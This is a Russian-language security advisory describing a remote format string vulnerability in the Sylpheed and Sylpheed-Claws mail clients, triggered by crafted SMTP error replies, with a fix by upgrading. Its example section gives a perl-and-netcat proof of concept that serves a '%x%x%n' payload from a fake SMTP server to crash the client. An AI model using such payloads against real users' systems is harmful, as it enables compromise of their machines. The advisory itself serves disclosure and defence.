Security Lab

Удаленное переполнение буфера в Sylpheed и Sylpheed-Claws

Дата публикации:24.10.2003
Всего просмотров:1324
Опасность:
Средняя
Наличие исправления: Да
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Компрометация системы
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: Sylpheed 0.x
Sylpheed-Claws 0.x
Уязвимые версии: Sylpheed-claws 0.9.6 - 0.9.4

Описание: Уязвимость обнаружена в Sylpheed и Sylpheed-Claws. Злонамеренный пользователь может скомпрометировать систему пользователя.

Уязвимость связанна с ошибкой форматной строки при обработке сообщений об ошибках от SMTP сервера. Злонамеренный SMTP сервер может возвратить специально обработанное сообщение об ошибке, чтобы выполнить произвольный код на системе пользователя.

Пример/Эксплоит:

Create a test account with smtp server localhost:1234
Then do:
perl -e 'print "535 failed %x%x%n\r\n"' | nc -l -p 1234
Then send a message.
Actual result - sylpheed crashes.

URL производителя: http://sylpheed.good-day.net/

Решение: Обновите программу до Sylpheed 0.9.7 или примените соответствующую заплату: http://sylpheed.good-day.net/

Ссылки: [Full-Disclosure] Sylpheed-claws format string bug, yet still sylpheed much better than windows